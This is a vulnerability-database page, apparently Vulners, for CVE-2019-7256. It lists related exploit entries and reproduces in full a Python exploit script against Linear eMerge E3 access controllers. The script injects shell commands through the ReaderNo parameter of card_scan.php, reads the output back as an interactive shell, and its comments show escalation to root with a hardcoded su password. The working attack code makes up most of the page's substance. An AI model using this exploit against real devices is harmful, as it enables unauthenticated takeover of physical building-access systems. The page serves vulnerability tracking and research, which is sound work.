| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
| Exploit for CVE-2024-9441 | 22 Nov 202402:04 | – | githubexploit | |
| eMerge E3 1.00-06 - Remote Code Execution Exploit | 12 Nov 201900:00 | – | zdt | |
| eMerge E3 Access Controller 4.6.07 - Remote Code Execution Exploit (2) | 12 Nov 201900:00 | – | zdt | |
| Linear eMerge E3 1.00-06 - Remote Code Execution Exploit | 13 Nov 201900:00 | – | zdt | |
| Linear eMerge E3-Series Access Controller Command Injection Exploit | 5 Jan 202300:00 | – | zdt | |
| CVE-2019-7256 | 2 Jul 201900:00 | – | attackerkb | |
| CVE-2022-31499 | 25 Aug 202223:15 | – | attackerkb | |
| CVE-2019-7256 | 9 Oct 202014:02 | – | circl | |
| Nice Linear eMerge E3-Series OS Command Injection Vulnerability | 25 Mar 202400:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 25 Mar 202412:00 | – | cisa |
`#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# [email protected]:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# [email protected]:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# [email protected]:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################
import requests
import sys,os##
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
sys.exit()
ipaddr = sys.argv[1]
print
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!\n"
break
else: continue
except Exception:
break
sys.exit()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation